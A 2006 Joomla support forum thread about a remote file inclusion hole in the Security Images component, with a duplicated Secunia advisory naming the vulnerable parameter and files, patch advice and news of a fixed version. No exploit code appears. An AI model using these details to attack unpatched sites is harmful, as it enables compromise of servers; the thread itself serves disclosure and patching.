[UPGRADE AVAIL.] Security Images Vulnerability
Moderator: General Support Moderators
Forum rules
- Elpie
- Joomla! Guru
- Posts: 903
- Joined: Wed Aug 17, 2005 11:26 pm
- Contact:
[UPGRADE AVAIL.] Security Images Vulnerability
Remote file include exploit is in the wild.
Last edited by RobS on Thu Aug 10, 2006 8:17 pm, edited 1 time in total.
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info
Open Source Research & Best Practice: http://osprojects.info
-
- Joomla! Enthusiast
- Posts: 182
- Joined: Thu Aug 18, 2005 8:43 pm
- Contact:
Re: Security Images 3.0.5
more specifics?
- Elpie
- Joomla! Guru
- Posts: 903
- Joined: Wed Aug 17, 2005 11:26 pm
- Contact:
Re: Security Images 3.0.5
I wish I could give more specifics, but as far as I am aware an official advisory has not yet been issued. I got my information from two blackhat sites, both giving scripts to use. I can only share that information with the projects developers, sorry
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info
Open Source Research & Best Practice: http://osprojects.info
-
- Joomla! Explorer
- Posts: 469
- Joined: Thu Aug 18, 2005 10:40 pm
- Location: las vegas USA
- Contact:
Re: Security Images 3.0.5
TITLE:
Joomla Security Images Component File Inclusion
SECUNIA ADVISORY ID:
SA21260
VERIFY ADVISORY:
http://secunia.com/advisories/21260/
CRITICAL:
Highly critical
IMPACT:
System access
WHERE:
From remote
SOFTWARE:
Security Images 3.x (component for Joomla)
http://secunia.com/product/11186/
DESCRIPTION:
Drago84 has discovered some vulnerabilities in the Security Images
component for Joomla, which can be exploited by malicious people to
compromise a vulnerable system.
Input passed to the "mosConfig_absolute_path" parameter is not
properly verified before being used to include files. This can be
exploited to execute arbitrary PHP code by including files from local
or external resources.
Affected files:
administrator/components/com_securityimages/configinsert.php
administrator/components/com_securityimages/lang.php
Successful exploitation requires that "register_globals" is enabled.
The vulnerabilities have been confirmed in version 3.0.5. Other
version may also be affected.
SOLUTION:
Edit the source code to ensure that input is properly verified.
Set "register_globals" to "Off".
PROVIDED AND/OR DISCOVERED BY:
Drago84
ORIGINAL ADVISORY:
http://milw0rm.com/exploits/2083
----------------------------------------------------------------------
Joomla Security Images Component File Inclusion
SECUNIA ADVISORY ID:
SA21260
VERIFY ADVISORY:
http://secunia.com/advisories/21260/
CRITICAL:
Highly critical
IMPACT:
System access
WHERE:
From remote
SOFTWARE:
Security Images 3.x (component for Joomla)
http://secunia.com/product/11186/
DESCRIPTION:
Drago84 has discovered some vulnerabilities in the Security Images
component for Joomla, which can be exploited by malicious people to
compromise a vulnerable system.
Input passed to the "mosConfig_absolute_path" parameter is not
properly verified before being used to include files. This can be
exploited to execute arbitrary PHP code by including files from local
or external resources.
Affected files:
administrator/components/com_securityimages/configinsert.php
administrator/components/com_securityimages/lang.php
Successful exploitation requires that "register_globals" is enabled.
The vulnerabilities have been confirmed in version 3.0.5. Other
version may also be affected.
SOLUTION:
Edit the source code to ensure that input is properly verified.
Set "register_globals" to "Off".
PROVIDED AND/OR DISCOVERED BY:
Drago84
ORIGINAL ADVISORY:
http://milw0rm.com/exploits/2083
----------------------------------------------------------------------
joomla 1.6 Türk destek sitesi http://www.joomlaturk.net/
- RobS
- Joomla! Ace
- Posts: 1366
- Joined: Mon Dec 05, 2005 10:17 am
- Location: New Orleans, LA, USA
- Contact:
Re: Security Images 3.0.5
Thanks all for the info... added to the official list.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
-
- Joomla! Apprentice
- Posts: 48
- Joined: Thu Nov 03, 2005 4:46 pm
Re: Security Images 3.0.5
it seems to me that anyone who understands php could easily patch Security Images.
only 2 files are listed as liabilities....
and the fix suggested in this forum is to harden the call to by defining the absolute path:
unfortunately, i don't know php well enough to apply this.
anyone?
only 2 files are listed as liabilities....
and the fix suggested in this forum is to harden the call to
Code: Select all
require_once($mosConfig_absolute_path."/administrator/components/com_securityimages/lang.php");
Code: Select all
define( 'YOURBASEPATH', dirname(__FILE__) );
require_once( YOURBASEPATH . '/file_to_include.php' );
anyone?
- Tonie
- Joomla! Master
- Posts: 16553
- Joined: Thu Aug 18, 2005 7:13 am
Re: Security Images 3.0.5
Version 3.06 has been brought out: http://forge.joomla.org/sf/projects/com_securityimages.
- tarquel
- Joomla! Apprentice
- Posts: 14
- Joined: Sun Jan 29, 2006 7:49 pm
- Location: Machynlleth, Mid-Wales, UK
- Contact:
Re: Security Images 3.0.5
wish i could get the new one to work
Using 3.0.6 and the latest Akobook version, but it just refuses to work.
Only can get the freecap plugin to appear - the other two just dont do anything - and even though it appears to work, when u submit the guestbook entry - having put the secuity word in, it doesnt work.
I thought that I was being dumb and that I hadnt realised it was case sensitive - but either I'm blind, or it really doesnt want to know.
I did wonder whether the hardening of the latest joomla but i'm not sure.
If anyone wants to try and see, go to the guestbook at: http://www.threeminutewarning.co.uk
I really feel like never updating any component or Joomla itself again as something always goes wrong hehe
/rant
Cheers
Nath.
Using 3.0.6 and the latest Akobook version, but it just refuses to work.
Only can get the freecap plugin to appear - the other two just dont do anything - and even though it appears to work, when u submit the guestbook entry - having put the secuity word in, it doesnt work.
I thought that I was being dumb and that I hadnt realised it was case sensitive - but either I'm blind, or it really doesnt want to know.
I did wonder whether the hardening of the latest joomla but i'm not sure.
If anyone wants to try and see, go to the guestbook at: http://www.threeminutewarning.co.uk
I really feel like never updating any component or Joomla itself again as something always goes wrong hehe
/rant
Cheers
Nath.
Nathan Harmsworth
Network Administrator of YBD [Edu]
Webmaster of Three Minute Warning and tarquel.net
Network Administrator of YBD [Edu]
Webmaster of Three Minute Warning and tarquel.net
- Elpie
- Joomla! Guru
- Posts: 903
- Joined: Wed Aug 17, 2005 11:26 pm
- Contact:
Re: Security Images 3.0.5
Nath - make sure you report this on the bug tracker on the forge's project pages.
Project devs do see these reports but may miss seeing forum posts.
Project devs do see these reports but may miss seeing forum posts.
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info
Open Source Research & Best Practice: http://osprojects.info
- tarquel
- Joomla! Apprentice
- Posts: 14
- Joined: Sun Jan 29, 2006 7:49 pm
- Location: Machynlleth, Mid-Wales, UK
- Contact:
Re: Security Images 3.0.5
Hi there
I've just posted a topic on their forum at http://forums.waltercedric.com/index.ph ... ,16.0.html
Can't seem to find the SF for the project hehe Maybe its me being dumb or something today lol
Cheers
Nath.
I've just posted a topic on their forum at http://forums.waltercedric.com/index.ph ... ,16.0.html
Can't seem to find the SF for the project hehe Maybe its me being dumb or something today lol
Cheers
Nath.
Nathan Harmsworth
Network Administrator of YBD [Edu]
Webmaster of Three Minute Warning and tarquel.net
Network Administrator of YBD [Edu]
Webmaster of Three Minute Warning and tarquel.net
-
- Joomla! Explorer
- Posts: 410
- Joined: Fri Aug 26, 2005 10:13 pm
- Location: Spain
- Contact:
Re: Security Images 3.0.5
Hi Nath,tarquel wrote: Hi there
I've just posted a topic on their forum at http://forums.waltercedric.com/index.ph ... ,16.0.html
Can't seem to find the SF for the project hehe Maybe its me being dumb or something today lol
Cheers
Nath.
From Walter Cedric's wiki you are referred to http://developer.joomla.org/sf/sfmain/d ... rityimages.
So that's the place to go!
My Extensions: JM-Recommend, JM-Credits, JM-Link Us (for J! 1.0.x). Find them in the 3rd Party Extensions Forum.
Joomla test installation: www.poraqui.net/joomla User: test Password: test
Joomla test installation: www.poraqui.net/joomla User: test Password: test
- tarquel
- Joomla! Apprentice
- Posts: 14
- Joined: Sun Jan 29, 2006 7:49 pm
- Location: Machynlleth, Mid-Wales, UK
- Contact:
Re: Security Images 3.0.5
ahhhhh thats the one
Thanks [and it looks like all my problems have been mentioned already - except integration into the SMF Bridge perhaps]
Cheers
Nath.
Thanks [and it looks like all my problems have been mentioned already - except integration into the SMF Bridge perhaps]
Cheers
Nath.
Nathan Harmsworth
Network Administrator of YBD [Edu]
Webmaster of Three Minute Warning and tarquel.net
Network Administrator of YBD [Edu]
Webmaster of Three Minute Warning and tarquel.net
-
- I've been banned!
- Posts: 21
- Joined: Wed Dec 19, 2007 10:36 pm
Re: Security Images 3.0.5
tell me more.Elpie wrote: I wish I could give more specifics, but as far as I am aware an official advisory has not yet been issued. I got my information from two blackhat sites, both giving scripts to use. I can only share that information with the projects developers, sorry
smile